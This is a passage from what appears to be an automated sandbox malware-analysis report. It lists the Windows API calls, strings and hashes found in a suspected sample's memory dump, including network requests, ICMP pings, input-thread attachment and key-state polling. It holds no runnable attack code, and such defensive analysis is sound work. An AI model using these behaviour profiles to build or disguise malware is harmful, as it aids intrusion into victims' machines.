                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: 0a6cd3393101b5be6f8d9f317b67a142f3160f7ac79abf6ea78dcb745bce1077
                                                        • Instruction ID: 8a2de6087644a8f38dd37dc385bfbee5a583e313ca05a452bfbe9f7b851585b9
                                                        • Opcode Fuzzy Hash: 0a6cd3393101b5be6f8d9f317b67a142f3160f7ac79abf6ea78dcb745bce1077
                                                        • Instruction Fuzzy Hash: 27619D71208311AFDB11DF54D848B6EB7E8AF84714F185429F989AB291C771ED88CB93
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00E98168
                                                        • inet_addr.WSOCK32(?,?,?), ref: 00E981AD
                                                        • gethostbyname.WSOCK32(?), ref: 00E981B9
                                                        • IcmpCreateFile.IPHLPAPI ref: 00E981C7
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E98237
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E9824D
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E982C2
                                                        • WSACleanup.WSOCK32 ref: 00E982C8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: ab2f8f720c9bfe03a98f1ef26d6ee261b5b1d7966c414bdc7b775a2538cb4725
                                                        • Instruction ID: 729f9df13cebd9102eac7ab1ec127815891c6b2c260ce5ddf62c106817c7c136
                                                        • Opcode Fuzzy Hash: ab2f8f720c9bfe03a98f1ef26d6ee261b5b1d7966c414bdc7b775a2538cb4725
                                                        • Instruction Fuzzy Hash: DF51D1316043009FDB20AF65CE45B6AB7E4EF4A310F14592AFA5AFB2B1DB71E905CB41
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E8E396
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E8E40C
                                                        • GetLastError.KERNEL32 ref: 00E8E416
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00E8E483
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 8c7fc5f1bfd5fe9fac8ea17bdaba2a555fc53fdcd2cbe52185526d0060709f3d
                                                        • Instruction ID: 3ef3936d40151f63a82fc5ef6303d5fd4ff5b3583c2d38f0b6f29aa43fbc51a5
                                                        • Opcode Fuzzy Hash: 8c7fc5f1bfd5fe9fac8ea17bdaba2a555fc53fdcd2cbe52185526d0060709f3d
                                                        • Instruction Fuzzy Hash: BA316F35A002099FDB01EBA8D945EBEB7B4EF49304F149025E61DBB392DB719E02CB91
                                                        APIs
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E7B98C
                                                        • GetDlgCtrlID.USER32 ref: 00E7B997
                                                        • GetParent.USER32 ref: 00E7B9B3
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E7B9B6
                                                        • GetDlgCtrlID.USER32(?), ref: 00E7B9BF
                                                        • GetParent.USER32(?), ref: 00E7B9DB
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E7B9DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1383977212-1403004172
                                                        • Opcode ID: 6fd9d5d2f6b7e6be56115c933ef447cb3b3ff6e57752f6a29bb1363768443f08
                                                        • Instruction ID: aa3c834ce1d8544138cbc008b4e7ea936fe1820d511dda2bf6efacbdf0e8ad94
                                                        • Opcode Fuzzy Hash: 6fd9d5d2f6b7e6be56115c933ef447cb3b3ff6e57752f6a29bb1363768443f08
                                                        • Instruction Fuzzy Hash: 6721D6B5900108BFCB04ABA1DC85EFEBBB4EF45310F105129F665B32E1DB75581ADB20
                                                        APIs
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E7BA73
                                                        • GetDlgCtrlID.USER32 ref: 00E7BA7E
                                                        • GetParent.USER32 ref: 00E7BA9A
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E7BA9D
                                                        • GetDlgCtrlID.USER32(?), ref: 00E7BAA6
                                                        • GetParent.USER32(?), ref: 00E7BAC2
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E7BAC5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1383977212-1403004172
                                                        • Opcode ID: 63fca22469c4fd585aa35625e186d539ec06b855f6721dc7cc8710f3f1f0c313
                                                        • Instruction ID: f0f90cefcf0043fdcdf62affbcbb1c0a911f879de8b954bbc1ba4554499e0c6c
                                                        • Opcode Fuzzy Hash: 63fca22469c4fd585aa35625e186d539ec06b855f6721dc7cc8710f3f1f0c313
                                                        • Instruction Fuzzy Hash: 6021C5B4900208BFDB00AB64CC85FFEBBB9EF45304F105025F555B31A1DB76591ADB20
                                                        APIs
                                                        • GetParent.USER32 ref: 00E7BAE3
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00E7BAF8
                                                        • _wcscmp.LIBCMT ref: 00E7BB0A
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E7BB85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: 6c0ecf5d8abdf482b041ea4aa02d13b086883bf90a3d5451bc046a04318725fe
                                                        • Instruction ID: 7923d7221071fd8d677f8255aa68e24f86591683177228ecac0c2233c25e58da
                                                        • Opcode Fuzzy Hash: 6c0ecf5d8abdf482b041ea4aa02d13b086883bf90a3d5451bc046a04318725fe
                                                        • Instruction Fuzzy Hash: 0C11067664C707FEFA206620EC06EB7779C9B11364B206026FE08F50D9EBA2A8128514
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00E9B2D5
                                                        • CoInitialize.OLE32(00000000), ref: 00E9B302
                                                        • CoUninitialize.OLE32 ref: 00E9B30C
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00E9B40C
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E9B539
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00E9B56D
                                                        • CoGetObject.OLE32(?,00000000,00ECD91C,?), ref: 00E9B590
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00E9B5A3
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E9B623
                                                        • VariantClear.OLEAUT32(00ECD91C), ref: 00E9B633
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: fdad23f0939538b89ad35ef4933061daba370796eccf6c071b397202ce260119
                                                        • Instruction ID: 32b9a03b506e3736bc6306f8f9350d273617b48686050527fbfd5f2a91f4e238
                                                        • Opcode Fuzzy Hash: fdad23f0939538b89ad35ef4933061daba370796eccf6c071b397202ce260119
                                                        • Instruction Fuzzy Hash: B6C12471608301AFCB04DF65D98496AB7E9FF88308F00596DF98AEB251DB71ED06CB52
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00E84047
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E830A5,?,00000001), ref: 00E8405B
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00E84062
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E830A5,?,00000001), ref: 00E84071
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E84083
                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00E830A5,?,00000001), ref: 00E8409C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E830A5,?,00000001), ref: 00E840AE
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E830A5,?,00000001), ref: 00E840F3
                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00E830A5,?,00000001), ref: 00E84108
                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00E830A5,?,00000001), ref: 00E84113
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: d041e81abb6897ec300a8ff305bd6427ae599a0dc60a3335234a22e5bb9fb521
                                                        • Instruction ID: f6bc07bfd6733c682a911989f25503c45f715173b70aca1e69ab64ccd93c8625
                                                        • Opcode Fuzzy Hash: d041e81abb6897ec300a8ff305bd6427ae599a0dc60a3335234a22e5bb9fb521
                                                        • Instruction Fuzzy Hash: CD319FF1601209AFEB11EB55DC49F6AB7ADFB50315F109025F90CF6290CBB69D808B61
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 00E5B496
                                                        • SetTextColor.GDI32(?,000000FF), ref: 00E5B4A0
                                                        • SetBkMode.GDI32(?,00000001), ref: 00E5B4B5
                                                        • GetStockObject.GDI32(00000005), ref: 00E5B4BD
                                                        • GetClientRect.USER32(?), ref: 00EBDD63
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00EBDD7A
                                                        • GetWindowDC.USER32(?), ref: 00EBDD86
                                                        • GetPixel.GDI32(00000000,?,?), ref: 00EBDD95
                                                        • ReleaseDC.USER32(?,00000000), ref: 00EBDDA7
                                                        • GetSysColor.USER32(00000005), ref: 00EBDDC5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                        • String ID:
                                                        • API String ID: 3430376129-0
                                                        • Opcode ID: e8361c68b3d5e4d3e42cc49ebbb510930fa5c05112dfb533793d3bd3e8e9d2d9
                                                        • Instruction ID: 0e08026dc065b1b8c39af0c3fb3cb90234ff1b8e142b4c075b7251a29986ea55
                                                        • Opcode Fuzzy Hash: e8361c68b3d5e4d3e42cc49ebbb510930fa5c05112dfb533793d3bd3e8e9d2d9
                                                        • Instruction Fuzzy Hash: EC115E31504205EFDB216FA5EC08FEA7B65EB04326F148635FA66B50E1DB33494ADF21
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E430DC
                                                        • CoUninitialize.OLE32(?,00000000), ref: 00E43181
                                                        • UnregisterHotKey.USER32(?), ref: 00E432A9
                                                        • DestroyWindow.USER32(?), ref: 00EB5079
                                                        • FreeLibrary.KERNEL32(?), ref: 00EB50F8
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EB5125
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 6c7bc6295ad01f82cc080b9caf393db64bdb50daf3a0f022fce8a59b7cf754e9
                                                        • Instruction ID: f335f272958de0644fd2a34aa3db6dfe8fc4c0dfa39fd205a5554eb919bffb2d
                                                        • Opcode Fuzzy Hash: 6c7bc6295ad01f82cc080b9caf393db64bdb50daf3a0f022fce8a59b7cf754e9
                                                        • Instruction Fuzzy Hash: B3913C317012028FC715EF24E895BA9F3E4FF04304F5462A9E50AB7262DB31AE5ACF54
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00E5CC15
                                                          • Part of subcall function 00E5CCCD: GetClientRect.USER32(?,?), ref: 00E5CCF6
                                                          • Part of subcall function 00E5CCCD: GetWindowRect.USER32(?,?), ref: 00E5CD37
                                                          • Part of subcall function 00E5CCCD: ScreenToClient.USER32(?,?), ref: 00E5CD5F
                                                        • GetDC.USER32 ref: 00EBD137
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EBD14A
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EBD158
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EBD16D
                                                        • ReleaseDC.USER32(?,00000000), ref: 00EBD175
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EBD200
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 6db2d8404e72c7a9887be1c886f989646338f8547e92cd4004c6f4cc4f5d54da
                                                        • Instruction ID: d0119744ad138f2ddf73a706d2c6db993586c2018726ebd2ea4d86aad8f6d5b5
                                                        • Opcode Fuzzy Hash: 6db2d8404e72c7a9887be1c886f989646338f8547e92cd4004c6f4cc4f5d54da
                                                        • Instruction Fuzzy Hash: 1C71F330404209DFCF219F68CC81AEB7BB5FF48319F246669ED557A1A6E7318845DF50
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                          • Part of subcall function 00E5B63C: GetCursorPos.USER32(000000FF), ref: 00E5B64F
                                                          • Part of subcall function 00E5B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00E5B66C
                                                          • Part of subcall function 00E5B63C: GetAsyncKeyState.USER32(00000001), ref: 00E5B691
                                                          • Part of subcall function 00E5B63C: GetAsyncKeyState.USER32(00000002), ref: 00E5B69F
                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00EAED3C
                                                        • ImageList_EndDrag.COMCTL32 ref: 00EAED42
                                                        • ReleaseCapture.USER32 ref: 00EAED48
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00EAEDF0
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EAEE03
                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00EAEEDC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                        • API String ID: 1924731296-2107944366
                                                        • Opcode ID: 9a8fd64df70458f9174514f9e3f3e50fc922c2dd7d5fd1b00a7738d890027382
                                                        • Instruction ID: 8dd9af4e89ecc75a3f90d286f109bd6a3c2df9ac1468cfbd805418105727f578
                                                        • Opcode Fuzzy Hash: 9a8fd64df70458f9174514f9e3f3e50fc922c2dd7d5fd1b00a7738d890027382
                                                        • Instruction Fuzzy Hash: E051AC70104304AFD710DF20DC96F6A77E4FB88304F10592DF995AB2E2DB71A909CB52
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E945FF
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E9462B
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E9466D
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E94682
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E9468F
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00E946BF
                                                        • InternetCloseHandle.WININET(00000000), ref: 00E94706
                                                          • Part of subcall function 00E95052: GetLastError.KERNEL32(?,?,00E943CC,00000000,00000000,00000001), ref: 00E95067
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 1241431887-3916222277
                                                        • Opcode ID: 6bf892ca931500187c4644af0ef7c3bd332005eda0624cfac610873e6e504248
                                                        • Instruction ID: 47ff4a328bc3b88c59088ae7e4bd611fff3cdfc3b5a0a3b69a3ee0f167a751e7
                                                        • Opcode Fuzzy Hash: 6bf892ca931500187c4644af0ef7c3bd332005eda0624cfac610873e6e504248
                                                        • Instruction Fuzzy Hash: 7A417EF2501209BFEF129F54CC89FFB77ACEF09358F005126FA05AA191D7B199468BA4
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EDDC00), ref: 00E9B715
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EDDC00), ref: 00E9B749
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E9B8C1
                                                        • SysFreeString.OLEAUT32(?), ref: 00E9B8EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: 27908dc2676b501ff0ab5e42ca22134973f346e0313d7cd39b6a7013dbaddba6
                                                        • Instruction ID: e562a82acb2787ca0e247758aab3fef5b2ed44cd8b181345b90de7d95ee8ebf7
                                                        • Opcode Fuzzy Hash: 27908dc2676b501ff0ab5e42ca22134973f346e0313d7cd39b6a7013dbaddba6
                                                        • Instruction Fuzzy Hash: CAF15A71A00209EFCF14DF94D984EAEB7B9FF89314F108098F915AB250DB71AE46CB90
                                                        APIs
                                                        • _memset.LIBCMT ref: 00EA24F5
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EA2688
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EA26AC
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EA26EC
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EA270E
